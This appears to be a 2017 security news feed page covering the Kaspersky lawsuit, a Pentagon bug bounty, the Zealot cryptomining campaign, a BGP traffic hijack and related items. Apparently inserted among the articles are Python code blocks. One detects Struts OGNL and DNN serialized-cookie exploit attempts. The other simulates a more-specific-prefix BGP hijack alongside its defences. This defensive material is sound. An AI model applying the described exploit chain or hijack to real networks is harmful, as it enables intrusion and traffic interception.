- BigBrothers -

Last update 09.10.2017 13:51:26




Kaspersky Lab files Lawsuit over DHS Ban of its products and services
19.12.2017 securityaffairs BigBrothers

Kaspersky Lab sues the U.S. Government over the product ban; its appeal was filed in the U.S. District Court for the District of Columbia.
Last week, the US President Donald Trump signed a bill that bans the use of Kaspersky Lab products and services in federal agencies.

Section 1634 of the bill prohibits the use of security software and services provided by the security giant; the ban takes effect on October 1, 2018.

Below are the details of the ban, as included in section 1634 of the National Defense Authorization Act for Fiscal Year 2018.

“SEC. 1634. Prohibition on use of products and services developed or provided by Kaspersky Lab.

(a) Prohibition.—No department, agency, organization, or other element of the Federal Government may use, whether directly or through work with or on behalf of another department, agency, organization, or element of the Federal Government, any hardware, software, or services developed or provided, in whole or in part, by—

(1) Kaspersky Lab (or any successor entity);
(2) any entity that controls, is controlled by, or is under common control with Kaspersky Lab; or
(3) any entity of which Kaspersky Lab has majority ownership.

(b) Effective date.—The prohibition in subsection (a) shall take effect on October 1, 2018.”

Now the security firm sues the U.S. Government over the product ban; its appeal was filed in the U.S. District Court for the District of Columbia and targets the DHS’s Binding Operational Directive 17-01.

Kaspersky considers the ban unconstitutional. According to the company, the US Government decided to prohibit its products based on reports citing anonymous sources, without strong evidence of its involvement in cyber espionage activities.

Kaspersky claims to have offered its support to the DHS for its investigation, but the agency issued the 17-01 directive, banning its security software and services without any warning.

The company maintains that the DHS should have given it the opportunity to view the information before the directive was issued.

Meanwhile, Eugene Kaspersky was invited to testify before Congress in September, but he was unable to travel to the U.S. in time for the hearing due to visa problems.

A second hearing was announced for October, but Kaspersky was not invited to testify.


The decision of the US Government is having a significant impact on the brand’s reputation, with a consequent effect on sales in almost every sector and country.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.


Eugene Kaspersky

@e_kaspersky
What to do when banned without evidence and the right to be heard? Well, we’re securing our rights by taking this to the courts. Why? We’ve done nothing wrong. https://kas.pr/nj7j
#SecurityWithoutBorders

7:40 PM - Dec 18, 2017
“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Eugene Kaspersky added.

The security firm also announced a new transparency initiative that involves giving partners access to its source code to rule out the presence of backdoors; it also proposed to pay substantially larger bug bounties for vulnerabilities found in its security solutions.


Kaspersky Sues U.S. Government Over Product Ban
19.12.2017 securityweek BigBrothers
Kaspersky Lab has filed a lawsuit against the U.S. government in response to the decision of the Department of Homeland Security (DHS) to ban the use of the company’s products in federal agencies.

The Russia-based cybersecurity firm’s appeal, filed in the U.S. District Court for the District of Columbia, targets the DHS’s Binding Operational Directive 17-01, which the agency issued in mid-September. President Donald Trump reinforced the ban last week when he signed the National Defense Authorization Act for FY2018.

Kaspersky says the ban is unconstitutional as it infringes the company’s due process rights. Kaspersky believes the DHS should have given it the opportunity to view the information and contest it before the directive was issued.

The company’s lawsuit also alleges that the decision to prohibit its products in federal agencies is largely based on rumors and media reports citing anonymous sources. While some believe the U.S. government may have actual evidence that Kaspersky Lab has been aiding Russia’s espionage efforts, no proof has been presented and even some officials appear to base their accusations on news reports.

Kaspersky claims that it voluntarily reached out to the DHS in July and offered to assist with any investigation into the company and its products. While the agency seemed to appreciate the offer and promised to get in touch, it did not do so, and instead it issued the 17-01 directive, banning the company’s software and services without warning.

The security firm says that while only a relatively small percentage of its revenue comes from the U.S. government, the DHS’s actions have had a negative impact on sales in other sectors, in both the United States and other countries.

“Through Binding Operational Directive 17-01, DHS has harmed Kaspersky Lab’s reputation, negatively affected the livelihoods of its U.S.-based employees and U.S.-based business partners, and undermined the company’s contributions to the broader cybersecurity community,” said Eugene Kaspersky, CEO and co-founder of Kaspersky Lab.

A majority of the accusations against Kaspersky Lab stem from its founder’s former ties to Russian intelligence. However, the CEO pointed out that most of the intelligence reports published by the company in the past years targeted Russian-speaking espionage groups.

In response to claims by U.S. officials that Kaspersky’s software is dangerous due to the deep level of access and privileges it requires, the Russian businessman highlighted that these capabilities are present in all security products and it’s unfair to single out his company without any evidence of wrongdoing.

“Dissuading consumers and businesses in the United States and abroad from using Kaspersky Lab products solely because of its geographic origins and without any credible evidence does not constitute a risk-based approach to cybersecurity and does little to address information security concerns related to government networks,” Eugene Kaspersky said.

Kaspersky has attempted to clear its name by launching a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

Eugene Kaspersky was invited to testify before Congress in September, but he was unable to travel to the U.S. in time for the hearing due to visa problems. A second hearing was announced for October, but the cyber security tycoon was not invited.


Pentagon Hacked in New U.S. Air Force Bug Bounty Program
18.12.2017 securityweek BigBrothers
The Hack the Air Force 2.0 bug bounty program kicked off earlier this month with researchers finding a critical vulnerability that could have been exploited to gain access to a network of the U.S. Department of Defense.

Hack the Air Force 2.0 started on December 9 with a live hacking competition hosted by the HackerOne platform at the WeWork Fulton Center inside the Fulton Center subway station in New York City.

During the event, Mathias Karlsson and Brett Buerhaus demonstrated how malicious actors could have breached an unclassified DoD network by exploiting a vulnerability in the Air Force’s website. They earned $10,650 for their findings, which is the largest single payout coming from any bug bounty program run by the U.S. government.

Seven U.S. Airmen and 25 civilian white hat hackers discovered a total of 55 vulnerabilities during the event, for which they earned $26,883.

Hack the Air Force 2.0 will run until January 1, 2018 and anyone can apply as long as they are a citizen or a permanent resident of Five Eyes countries, NATO countries, or Sweden. People from 31 countries can take part in the initiative, which makes it the most open government bug bounty program to date. Members of the U.S. military can also participate, but they are not eligible for bounties.

While anyone from these countries can apply, not everyone will be invited to actually take part. The Air Force will invite 600 people: 70 percent of them selected based on their HackerOne reputation score and the other 30 percent selected randomly.

“Hack the Air Force allowed us to look outward and leverage the range of talent in our country and partner nations to secure our defenses,” said Air Force CISO Peter Kim. “We're greatly expanding on the tremendous success of the first challenge by opening up approximately 300 public facing AF websites. The cost-benefit of this partnership is invaluable.”

Hack the Air Force 2.0 was announced following the success of the first Hack the Air Force program, which resulted in more than $130,000 being paid out for over 200 valid vulnerability reports.

Previous DoD bug bounty projects included Hack the Pentagon, which resulted in payouts of roughly $75,000, and Hack the Army, with rewards totaling approximately $100,000. The Pentagon has paid more than $300,000 for over 3,000 flaws discovered in its public-facing systems, but the organization estimates that it saved millions of dollars by running these programs.

Roughly one year ago, the Pentagon announced a vulnerability disclosure policy that aims to provide guidance to researchers on how to disclose security holes found in the organization’s public-facing websites. While no monetary rewards are being offered, the policy provides a legal avenue for reporting flaws.


"Zealot" Apache Struts Attacks Abuse NSA Exploits
18.12.2017 securityweek BigBrothers
A sophisticated multi-staged Apache Struts cyber attack campaign is abusing NSA-linked exploits to target internal networks, researchers from F5 Networks have discovered.

Dubbed Zealot, the highly obfuscated attack uses the EternalBlue and EternalSynergy exploits to target Windows and Linux systems. The newly uncovered campaign employs a PowerShell agent to compromise Windows systems and a Python agent to target Linux/OS X. The scripts appear based on the EmpireProject post-exploitation framework, F5 says.

The attack is targeting servers vulnerable to CVE-2017-5638 (Apache Struts Jakarta Multipart Parser attack) and CVE-2017-9822 (a flaw in the DotNetNuke (DNN) content management system). The main purpose of the campaign is to mine for the Monero cryptocurrency.

“The Zealot campaign aggressively targets both Windows and Linux systems, with the DNN and Struts exploits together. When looking more closely at the unusually high obfuscated payload, we discovered a much more sophisticated multi-staged attack, with lateral movement capabilities, leveraging the leaked NSA-attributed EternalBlue and EternalSynergy exploits,” the researchers reveal.

The attack starts with two HTTP requests, one of which is the notorious Apache Struts exploit via the Content-Type header. Java code is executed to determine the underlying OS on the targeted system.

On Linux, shell commands are executed in the background to download and execute a spearhead bash script that checks whether the machine is already infected and then fetches and runs a crypto-miner file named “mule”.

The Python code checks whether a firewall solution is running and fetches more code from the command and control (C&C) server. The received response is encrypted so that it cannot be detected by typical network inspection devices.

“When sending the request to the C&C, specific User-Agent and Cookie headers are added. This technique means that anyone (like us researchers) who tries to access the C&C from their own browser or a tool won’t get the same response as the malware,” F5 explains.

On Windows systems, the Struts payload runs a PowerShell interpreter in a hidden mode, which in turn executes a base64-encoded script pointing to a file on a different domain. Even more heavily obfuscated, the file is “scv.ps1,” a PowerShell script that downloads the miner and runs it. It can also download the malware as a DLL and inject it into the PowerShell process using reflective DLL injection.

The malicious code also downloads the Python installer and deploys it if Python 2.7 is not present on the targeted Windows system. It then downloads the main Python module to initiate propagation over the internal network.

Two more files are downloaded onto the machine, namely “zealot.zip” and “raven64.exe.” The former includes several Python scripts and libraries, including a script designed to execute the EternalBlue and EternalSynergy exploits, an SMB protocol wrapper, and a series of known Python packages.

The “raven64.exe” file scans the internal network for port 445 and calls the main script to inject three different shellcodes for Windows 7 and Windows 8 systems to exploit EternalSynergy and EternalBlue. After execution, a PowerShell script downloads the “scv.ps1” agent, but from a different server.

“The “mule” malware is a cryptocurrency malware mining for the Monero currency. Monero has become the cybercrime currency of choice due to its high anonymity. The amount that was paid for this specific miner address was approximately $8,500. It is not known how much profit the threat actor has overall,” F5 says.

The security researchers also determined that the Zealot attackers used the public EmpireProject, a PowerShell and Python post-exploitation agent.

The second HTTP request observed in this campaign is attempting to exploit the ASP.NET-based content management system DotNetNuke by sending a serialized object via a vulnerable DNNPersonalization cookie. The goal is to obtain arbitrary code execution to run the same PowerShell script delivered via the Apache Struts exploit.

The NSA exploits have been abused in previous campaigns, including NotPetya and WannaCry ransomware, along with the Adylkuzz cryptominer, but Zealot seems to be the first Struts campaign using these exploits.

The new attack also opens “new attack vector doors, automatically delivering malware on internal networks via web application vulnerabilities. The level of sophistication we are currently observing in the Zealot campaign is leading us to believe that the campaign was developed and is being run by threat actors several levels above common bot herders,” F5 concludes.


Zealot Campaign leverages NSA exploits to deliver Monero miners on both Windows and Linux servers
18.12.2017 securityaffairs BigBrothers

Security researchers spotted a sophisticated malware campaign, tracked as Zealot campaign targeting Linux and Windows servers to install Monero miners.
Security researchers from F5 Networks spotted a sophisticated malware campaign targeting Linux and Windows servers to install Monero cryptocurrency miners. They named it Zealot, after zealot.zip, one of the files dropped on targeted servers.

Hackers are using a wide arsenal of exploits to compromise the servers and install the malware, including the same code used in the Equifax hack.

F5 Networks experts observed threat actors scanning the Internet for specific unpatched servers and compromising them with two exploits, one for Apache Struts (CVE-2017-5638) and one for the DotNetNuke ASP.NET CMS (CVE-2017-9822).

“F5 threat researchers have discovered a new Apache Struts campaign. This new campaign is a sophisticated multi-staged attack targeting internal networks with the NSA-attributed EternalBlue and EternalSynergy exploits.” states the analysis from F5 Networks.

“We have dubbed the campaign “Zealot” based on the name of the zip file containing the python scripts with the NSA-attributed exploits. As we continue to research this campaign, we will update this publication.”

The exploit for the Struts vulnerability includes malicious code for targeting both Linux and Windows machines at the same time.

Once the hackers had infected a Windows machine, they used the EternalBlue and EternalSynergy exploits (both part of the huge trove of NSA data leaked by the Shadow Brokers earlier this year) for lateral movement in the target network.

In the last stage of the attack, threat actors would use PowerShell to download and install the Monero miner.

The attack against Linux servers sees attackers using Python scripts that appear to be taken from the EmpireProject post-exploitation framework, to install the same Monero miner.

“Zealot seems to be the first Struts campaign using the NSA exploits to propagate inside internal networks. There were other malware campaigns like NotPetya and WannaCry ransomware, and also Adylkuzz cryptominer launching attacks by directly scanning the Internet for SMBs to exploit with the NSA tools the ShadowBrokers released.” continues the analysis.

“The Zealot campaign, however, seems to be opening new attack vector doors, automatically delivering malware on internal networks via web application vulnerabilities.”

The researchers reported that the amount paid to the miner address associated with the Zealot campaign was approximately $8,500 USD; it cannot be excluded that the crooks also used other Monero wallets.

The researchers warned that the final-stage payload could change: the same campaign could be used to deliver ransomware.

Another curiosity that emerged from the analysis is that the attackers appear to be big fans of the legendary StarCraft game; in fact, many of the terms and file names used in this campaign are characters of the game (i.e. Zealot, Observer, Overlord, Raven).

“The level of sophistication we are currently observing in the Zealot campaign is leading us to believe that the campaign was developed and is being run by threat actors several levels above common bot herders,” concluded the analysis.
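Both Zealot write-ups above name the same two entry vectors: an OGNL expression smuggled in the Struts Content-Type header (CVE-2017-5638) and a serialized object in the DNNPersonalization cookie (CVE-2017-9822). The following detector is an added example, not F5's code; it assumes a constructed JSON-lines request log with `content_type` and `cookies` fields, an assumed allowlist of benign DNN item types, and placeholder strings in place of real payloads.

```python
"""Flag the two Zealot entry vectors in a constructed request log."""
import json
import re

# A syntactically valid media type: type/subtype plus optional ;name=value parameters.
MEDIA_TYPE_RE = re.compile(
    r"^[\w!#$&^.+-]+/[\w!#$&^.+-]+(\s*;\s*[\w.-]+=(\"[^\"]*\"|[^;\s]+))*\s*$"
)
# "%{" / "${" open an OGNL expression and never occur in a legitimate media type.
OGNL_MARKER_RE = re.compile(r"[%$]\{")

# DNN stores personalization as XML <item key=... type=...> elements. Assumption for
# this example: legitimate cookies only carry these simple types; anything else is a
# serialized object the application never wrote itself.
ALLOWED_DNN_TYPES = {"System.String", "System.Int32", "System.Boolean"}
DNN_ITEM_TYPE_RE = re.compile(r'<item[^>]*\stype="([^"]+)"')


def inspect_content_type(value):
    """Return a reason string if the Content-Type header looks like a Struts probe."""
    if value is None:
        return None
    if OGNL_MARKER_RE.search(value):
        return "Content-Type carries an OGNL expression marker (CVE-2017-5638 pattern)"
    if not MEDIA_TYPE_RE.match(value):
        return "Content-Type is not a syntactically valid media type"
    return None


def inspect_dnn_cookie(cookies):
    """Return a reason string if DNNPersonalization deserializes an unexpected type."""
    raw = cookies.get("DNNPersonalization")
    if not raw:
        return None
    unexpected = [t for t in DNN_ITEM_TYPE_RE.findall(raw) if t not in ALLOWED_DNN_TYPES]
    if unexpected:
        return ("DNNPersonalization cookie deserializes unexpected type(s): "
                + ", ".join(unexpected) + " (CVE-2017-9822 pattern)")
    return None


def scan_log(lines):
    """Return (line_no, source_ip, reason) for every suspicious request."""
    findings = []
    for line_no, line in enumerate(lines, 1):
        rec = json.loads(line)
        checks = (inspect_content_type(rec.get("content_type")),
                  inspect_dnn_cookie(rec.get("cookies", {})))
        for reason in checks:
            if reason:
                findings.append((line_no, rec.get("src"), reason))
    return findings


# Constructed sample log (field names, addresses and payload placeholders are invented).
SAMPLE_RECORDS = [
    {"src": "203.0.113.5", "path": "/app/upload.action",
     "content_type": "multipart/form-data; boundary=----constructedBoundary", "cookies": {}},
    {"src": "198.51.100.7", "path": "/app/index.action",
     "content_type": "%{(#constructed_ognl_placeholder)}", "cookies": {}},
    {"src": "203.0.113.9", "path": "/DesktopModules/Default.aspx",
     "content_type": "application/x-www-form-urlencoded",
     "cookies": {"DNNPersonalization":
                 '<profile><item key="name" type="System.String"><string>jane</string></item></profile>'}},
    {"src": "198.51.100.8", "path": "/DesktopModules/Default.aspx",
     "content_type": "text/plain",
     "cookies": {"DNNPersonalization":
                 '<profile><item key="name" type="Constructed.Placeholder.GadgetType"><x/></item></profile>'}},
]
SAMPLE_LOG = [json.dumps(r) for r in SAMPLE_RECORDS]

if __name__ == "__main__":
    for line_no, src, reason in scan_log(SAMPLE_LOG):
        print(f"line {line_no} from {src}: {reason}")
```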


US Military wants cyber warriors along with soldiers on the Battlefield
16.12.2017 securityaffairs BigBrothers

Cyber warriors and soldiers will fight together on the battlefield, the US Army will soon send its cyber experts to support the conventional army.
The news was reported by officials this week and confirms the strategic importance of information warfare in the modern military. Cyber warriors will be engaged in offensive operations against enemy computer networks.

The Army is investing in cyber capabilities training a new generation of cyber soldiers at a huge center in southern California.

According to Colonel Robert Ryan, who commands a Hawaii-based combat team, while the Army’s mission is generally to “attack and destroy,” the cyber troops will have a different and crucial role in the battle.

“Not everything is destroy. How can I influence by non-kinetic means? How can I reach up and create confusion and gain control?” he explained.

The involvement of cyber troops in military operations is not new: cyber warriors have been integrated in infantry units for six months. Colonel William Hartman of the Army’s Cyber Command added that they will tailor operations according to commanders’ needs.

Hartman didn’t reveal details of the cyber operations that will be assigned to cyber soldiers; he only said that they would be involved in information gathering and intelligence.

In August, President Donald Trump ordered the US Military to create a separate cyber warfare command tasked with cyber warfare operations.

The President envisioned a separate command specialized in electronic and online offensive and defensive operations.

“This new Unified Combatant Command will strengthen our cyberspace operations and create more opportunities to improve our nation’s defense,” Trump said in a statement.

“The elevation of United States Cyber Command demonstrates our increased resolve against cyberspace threats and will help reassure our allies and partners and deter our adversaries.”

US cyber warriors have also been involved in counter-terrorism operations: according to the New York Times, CYBERCOM conducted missions to infiltrate and spy on Islamic State group networks. In some cases, the cyber troops altered commanders’ messages so they unwittingly directed ISIS militants to areas likely to be hit by drone or plane strikes.


Germany – Court rules against foreign intelligence agency (BND) surveillance
16.12.2017 securityaffairs BigBrothers

According to a German court, the BND must not store the metadata of international phone calls for the purpose of intelligence analysis.
Just a week ago, we discussed the law the German Government is preparing that would force hardware vendors to include a backdoor in their products and allow its unit to hack back; now a German court has ruled against the foreign intelligence agency’s mass communication surveillance.

According to the court, the German foreign intelligence agency (BND) must not store the metadata of international phone calls for the purpose of intelligence analysis.

In April 2016, the German government replaced the head of the external intelligence service after a barrage of criticism over the support offered by the Bundesnachrichtendienst (BND) to the NSA in spying activities on European targets.

In June 2016, the government of Berlin approved new measures to rein in the activities of BND agency after its scandalous support to NSA surveillance activity.

In June 2015, Wikileaks released another collection of documents on the extended economic espionage activity conducted by the NSA in Germany. The cyber spies were particularly interested in the Greek debt crisis. The US intelligence targeted German government representatives due to their privileged position in the negotiations between Greece and the EU.

Germany had reacted with outrage when Snowden leaked documents demonstrating the surveillance activity; in response, Chancellor Merkel proposed the establishment of an external watchdog panel of jurists to evaluate the activities of the intelligence agency.

“Spying on friends is not on at all” said the Chancellor Merkel at the time.

“Surveillance is a sensitive issue in Germany after the abuses by the Gestapo during the Nazi era and the Stasi in Communist East Germany during the Cold War. Whistleblower Edward Snowden’s revelations about the United States spying on Germany also caused upset.” reports the Reuters Agency.


In 2015, the media freedom organization Reporters Without Borders filed a lawsuit against the BND, accusing it of having breached the organization’s secrecy and harmed the partners and reporters it worked with.

“The verdict shows that it pays off when human rights organizations defend themselves against the mass storage of data by the BND,” said Christian Mihr, Reporters Without Borders director in Berlin.

Asked by Reuters about the ruling, the BND said it would wait for the final verdict’s legal justification.


U.S. Military to Send Cyber Soldiers to the Battlefield
14.12.2017 securityweek BigBrothers
The US Army will soon send teams of cyber warriors to the battlefield, officials said Wednesday, as the military increasingly looks to take the offensive against enemy computer networks.

While the Army's mission is generally to "attack and destroy," the cyber troops have a slightly different goal, said Colonel Robert Ryan, who commands a Hawaii-based combat team.

"Not everything is destroy. How can I influence by non-kinetic means? How can I reach up and create confusion and gain control?" he told reporters.

The cyber soldiers have been integrated for six months in infantry units, and will tailor operations according to commanders' needs, said Colonel William Hartman of the Army's Cyber Command.

The Army has for the past three years conducted training for such operations at a huge center in southern California.

Hartman didn't give details on what the cyber troops can achieve, except to say that they would be scooping up information or intercepting planned attacks.

According to the New York Times, CYBERCOM has previously placed "implants" in Islamic State group networks that let experts monitor the group's behavior and ultimately imitate or alter commanders' messages so they unwittingly direct fighters to areas likely to be hit by drone or plane strikes.

Another technique likely being employed is a common type of cyber attack known as a denial of service.

Cyber Command had previously been a subordinate part of the US Strategic Command, but President Donald Trump in August ordered the Pentagon to elevate it to its own command, in a sign of its growing importance.


U.S. Prosecutors Confirm Uber Target of Criminal Probe
14.12.2017 securityweek BigBrothers
A letter made public Wednesday in Waymo's civil suit against Uber over swiped self-driving car secrets confirmed the ride-share service is the target of a US criminal investigation.

The US Attorney's Office in Northern California sent the letter to US Judge William Alsup last month to share some of what they have learned "in the course of a United States' pending criminal investigation," according to a copy of the paperwork obtained by AFP.

Alsup had referred the case to the Justice Department to look into possible criminal charges, but prosecutors remained mum after that. Information shared by the department with Alsup sparked a courtroom furor over the possibility that Uber operated a program to hide nefarious tactics.

It also resulted in the trial being delayed a second time, with the judge setting a new start date of February 5.

The US Attorney's Office said in the missive to Alsup that they interviewed former Uber manager of global intelligence Richard Jacobs, who contended that "employees routinely used non-attributable electronic devices to store and transmit information that they wished to separate from Uber's official systems."

Attorneys representing Uber have repeatedly assured the judge no files taken from Waymo ever touched Uber servers.

Jacobs' attorney laid out his allegations in May in a letter to Uber's associate general counsel, according to the Justice document.

Alsup continues to mull whether it should have been shared during an evidence-gathering phase of the civil case.

The letter signed by Jacobs told of an effort to evade discovery requests, court orders, and government investigations "in violation of state and federal law, as well as ethical rules governing the legal profession."

Techniques used included smartphones or laptop computers that couldn't be traced back to the company, and communicating through encrypted, vanishing message service Wickr, according to the letter and a transcript of courtroom testimony obtained by AFP.

Jacobs testified that he left Uber early this year with a compensation deal valued at $4.5 million.

As part of that agreement with Uber, Jacobs remained a consultant on the payroll.

Uber executives who testified denied any wrongdoing or trail-covering.

The civil case stems from a lawsuit filed by Waymo -- previously known as the Google self-driving car unit -- which claimed former manager Anthony Levandowski took technical data with him when he left to launch a competing venture that went on to become Otto and was later acquired by Uber.

Uber is also a target of investigations and lawsuits over the cover-up of a hack that compromised personal information of 57 million users and drivers.

Uber purportedly paid data thieves $100,000 to destroy the swiped information -- and remained quiet about the breach for a year.

US justice officials are also investigating suspicions of foreign bribery and use of illegal software to spy on competitors or escape scrutiny of regulators.


Traffic to Major Tech Firms Rerouted to Russia
14.12.2017 securityweek BigBrothers
Internet traffic for some of the world’s largest tech firms was briefly rerouted to Russia earlier this week in what appeared to be a Border Gateway Protocol (BGP) attack.

OpenDNS-owned Internet monitoring service BGPmon reported the incident on Tuesday. BGPmon noticed that 80 IP prefixes for organizations such as Google, Microsoft, Apple, Facebook, NTT Communications, Twitch and Riot Games had been announced by a Russian Autonomous System (AS).

It happened twice on Tuesday and each time it only lasted for roughly three minutes. The first event took place between 04:43 and 04:46 UTC, and the second between 07:07 and 07:10 UTC.

Despite being short-lived, BGPmon said the incidents were significant, including due to the fact that the announcements were picked up by several peers and some large ISPs, such as Hurricane Electric and Zayo in the U.S., Telstra in Australia, and NORDUnet, which is a joint project of several Nordic countries.

Another interesting aspect was that all the targeted traffic was associated with high-profile organizations. Experts also pointed out that the Russian AS (AS39523) had not been seen making announcements for several years before this incident.

“What makes this incident suspicious is the prefixes that were affected are all high profile destinations, as well as several more specific prefixes that aren’t normally seen on the Internet. This means that this isn’t a simple leak, but someone is intentionally inserting these more specific prefixes, possibly with the intent to attract traffic,” BGPmon said in a blog post.

“Whatever caused the incident today, it’s another clear example of how easy it is to re-route traffic for 3rd parties, intentionally or by accident. It also is a good reminder for every major ISP to filter customers,” the company added.

Robert Hamilton, director of product marketing at Imperva, said it’s hard to say what the goal was in this specific case considering that the attack was short-lived, but he noted that these types of attacks can be used for various things, “like spoofing websites in order to get visitors to download malicious content or to give up personal details or financial information.”

Chris Morales, head of security analytics at Vectra, a California-based provider of automated threat management solutions, pointed out that users accessing online resources of Google, Apple, Facebook, Microsoft and the other impacted companies trust that their communications are secure because of the use of HTTPS. However, entities that are capable of manipulating the BGP routing protocol to perform man-in-the-middle (MitM) attacks can also manipulate the TLS/SSL encryption and eavesdrop on users.

BGP hijacking

BGP is a protocol used for exchanging routing information between independent networks on the Internet, also known as Autonomous Systems, particularly determining the most efficient route between them. Each AS announces a list of IP address spaces that are known as prefixes, and shares data with its neighbors (peers) to help determine the most efficient path.

Jason Kent, CTO of security consulting firm AsTech, has provided a simple explanation of how it all works and why the “suspicious” event spotted by BGPmon was possible.

“The routers [that peer with these big organizations] all communicate with one another to create the largest routing tables. When a member of a new group of routers announces its routes, to the other members, they all update a table. When a user goes to apple.com, really they are going to one of Apple’s web servers with IP addresses like 105.68.88.209, but the user's ISP has to figure out where that is. So the ISP has this big routing table that says, basically, the way to get to 105.x.y.z is via this peer, and sends it the traffic,” Kent explained.

“The big routing table is kept updated by announcements from other devices. Basically a large community of routers within the Internet all tell one another the places they know how to go,” Kent said. “These announcements and updates are performed over a system [BGP] that is both old and rarely updated. It’s possible to spoof the announcements, in the right way and method, and fool all devices that route traffic, that your controlled device knows where to take it and has the best path.”

BGP hijacking attacks have been conducted for many years and while protections against such threats do exist for ISPs, they can often be bypassed by both cybercriminals and state-sponsored actors.

“For example, governments can use it for restricting internet access to particular websites or filtering content like advertisements that they deem illegal,” explained Joseph Carson, chief security scientist at PAM solutions provider Thycotic. “One of the most well-known cases was when in 2008 Pakistan attempted to block YouTube access and took YouTube down completely and brought their own internet access to its knees.”

“For cybercriminals, it is typically used to replace content from third party website requests like advertisements with infected websites used to distribute malware,” Carson added. “You could also use it to take down websites or even direct web traffic to a country causing a DDOS attack.”
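To make the explanation above concrete, here is an added example (not code from the article, BGPmon or Qrator) that models the mechanism Kent describes: a router picks the most specific prefix it has heard, so a more-specific announcement from a rogue AS captures traffic, and a monitor comparing announcements against registered origin ASes, plus customer prefix filtering at the ISP edge, are the two defences the quoted experts mention. The address ranges and AS numbers are documentation/private values chosen for the example.

```python
"""Toy model of a BGP more-specific prefix hijack and two defences the article
mentions: a monitor alerting on unexpected origin ASes (as BGPmon does) and a
customer prefix filter at the ISP edge. Constructed example using documentation
address ranges and private ASNs; not code from BGPmon, Qrator or the article."""
import ipaddress
from dataclasses import dataclass


@dataclass(frozen=True)
class Route:
    prefix: ipaddress.IPv4Network
    origin_as: int          # AS that originated the announcement
    as_path: tuple          # ASes the announcement traversed, origin last


class RoutingTable:
    """Longest-prefix-match table, as a transit router builds it from peers."""

    def __init__(self):
        self.routes = {}    # prefix -> Route

    def announce(self, route):
        self.routes[route.prefix] = route

    def lookup(self, ip):
        addr = ipaddress.IPv4Address(ip)
        candidates = [r for p, r in self.routes.items() if addr in p]
        if not candidates:
            return None
        # The most specific prefix wins, regardless of who announced it.
        return max(candidates, key=lambda r: r.prefix.prefixlen)


# Registered origin per prefix, as a prefix owner would configure in a route
# monitoring service (constructed: TEST-NET ranges and documentation ASNs).
EXPECTED_ORIGIN = {
    ipaddress.ip_network("203.0.113.0/24"): 64500,
    ipaddress.ip_network("198.51.100.0/24"): 64501,
}


def check_announcement(route, expected=EXPECTED_ORIGIN):
    """Monitor view: alert when an announcement covers a registered prefix
    (exactly or more specifically) but originates from a different AS."""
    alerts = []
    for legit_prefix, legit_as in expected.items():
        if route.prefix.subnet_of(legit_prefix) and route.origin_as != legit_as:
            kind = ("more-specific hijack" if route.prefix.prefixlen > legit_prefix.prefixlen
                    else "origin hijack")
            alerts.append(f"{kind}: {route.prefix} originated by AS{route.origin_as}, "
                          f"expected AS{legit_as}")
    return alerts


def customer_filter(route, customer_as, allowed_prefixes):
    """ISP edge view: accept a customer's announcement only for prefixes the
    customer is authorised to originate. Rejecting the rest is the
    'filter customers' step Qrator refers to."""
    if route.origin_as != customer_as:
        return False
    return any(route.prefix.subnet_of(p) for p in allowed_prefixes)


def demo():
    """Run the hijack against a table and return (origin before, origin after,
    monitor alerts, whether a filtering upstream would have accepted it)."""
    table = RoutingTable()
    legit = Route(ipaddress.ip_network("203.0.113.0/24"), 64500, (64510, 64500))
    table.announce(legit)
    before = table.lookup("203.0.113.10").origin_as

    # Rogue AS64666 announces a /25 inside the victim's /24. Every router that
    # accepts it now prefers the rogue path for half of the victim's addresses.
    hijack = Route(ipaddress.ip_network("203.0.113.0/25"), 64666, (64520, 64666))
    table.announce(hijack)
    after = table.lookup("203.0.113.10").origin_as

    alerts = check_announcement(hijack)
    # AS64666 is a customer of AS64520, which only authorised it for 192.0.2.0/24.
    accepted = customer_filter(hijack, 64666, [ipaddress.ip_network("192.0.2.0/24")])
    return before, after, alerts, accepted


if __name__ == "__main__":
    print(demo())
```

Running it shows the lookup for 203.0.113.10 switching from AS64500 to AS64666 the moment the /25 is accepted, while both the monitor and the customer filter would have caught the announcement.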


UK Spy Chiefs Peel Back Secrecy -- to Fight Cybercrime
14.12.2017 securityweek BigBrothers
Britain's cyber-spooks are reaching out from behind their veil of secrecy with the aim of cultivating the nation's next generation of high-tech sentries -- a move not without security risks.

With recruiting initiatives levelled at tech-savvy hipsters, start-ups pitching ideas and even Christmas puzzles, the top-secret Government Communications Headquarters (GCHQ) is letting the public in, ever so slightly.

The latest move was this month's "Cyber Accelerator" event at the National Cyber Security Centre (NCSC) -- part of GCHQ -- when investors, journalists and entrepreneurs were offered a rare glimpse behind the scenes.

The Accelerator project connects tech entrepreneurs with GCHQ experts and information, aiming to help the budding companies turn their ideas into ready-for-market cyber-defence products.

The move is the latest in a series of initiatives by the security services to open their doors to young tech wizards -- a subtle effort to recruit the best and brightest as Britain's future cyber-sentries.

GCHQ has previously used stencil graffiti recruitment adverts in the fashionable east London tech hub, and also launched an online puzzle comprising 29 blocks of letters to be decoded by aspiring cyber spies.

During the visit to Accelerator, visitors were whisked up to the National Cyber Security Centre's offices in central London in space-age lifts.

Once arrived, they got to see the latest weapons the entrepreneurs were pitching to private investors as part of the programme.

"Razor wire is there to keep people out, but it does quite a good job of keeping people in. It does create an internal community and we wanted to break out of that," said Chris Ensor, NCSC's deputy director for cyber-skills and growth.

"Accelerator is the natural next step, going out into the wider world."

Nine businesses, who are working with GCHQ for nine months, pitched ideas including defences for crypto-currencies and domestic web-connected products as well as hardware that can wipe the contents of a laptop in case of theft.

Matt Hancock, a junior minister for digital and culture affairs, encouraged investors to dig deep, saying that GCHQ's efforts to engage with the outside world were bearing fruit.

"The small acorn is now beginning to grow into an oak," he said.

- Security risk -

Stressing the urgency of the challenge, NCSC technical director Ian Levy revealed that the agency has dealt with 600 major cyber incidents in its first year, 35 of which were classed as serious.

"They have taught us some things," he said. "Our adversaries are infinitely inventive, they're brilliant."

Alan Woodward, a cybersecurity expert at the University of Surrey, praised Britain for harnessing individual inspiration with the power of government.

"Some of the best ideas have come from one man and his shed, it's the modern version of that.

"They don't always find a natural home in big business or government, this is about trying to give them a leg up," he said.

